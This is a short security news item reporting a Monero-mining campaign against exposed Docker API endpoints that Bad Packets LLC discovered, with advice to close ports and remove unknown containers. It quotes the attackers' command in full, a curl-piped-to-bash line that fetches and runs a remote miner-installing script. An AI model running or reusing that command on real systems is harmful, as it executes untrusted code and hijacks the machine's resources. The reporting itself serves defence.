Vulnerable Docker Instance Sought Out by Monero Malware
Near the end of November it was discovered that some Docker instances were vulnerable to a specific attack vector that would allow the injection of Monero mining programs. During the two days the target campaign was live, over 14.82 XMR was mined. That amount translates to roughly $800.00 USD.
Although that amount wasn’t enough to turn heads, what was significant in this vulnerability was the amount of scans that occurred. During that campaign, hackers scanned up to 59,000 IP networks for exposed API endpoints. Once attackers located an exposed endpoint, an Alpine Linux OS container was deployed to run chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash; (a command to download a bash script which would install the XMRRig cryptocurrency miner).
The issue was discovered by security firm Bad Packets LLC, which also found the malware contained a self-defense measure that not only disables security, but shuts down processes associated with rival cryptocurrency-mining botnets.
To avoid such a vulnerability, Troy Mursch (co-founder and Chief Research Officer of Bad Packets LLC) says Docker container admins should immediately check to see if they are exposing API endpoints to the internet. If so, admins should close exposed ports and stop/delete any unrecognized containers.
Subscribe to our ADMIN Newsletters
Subscribe to our Linux Newsletters
Find Linux and Open Source Jobs
Most Popular
Support Our Work
ADMIN content is made possible with support from readers like you. Please consider contributing when you've found an article to be beneficial.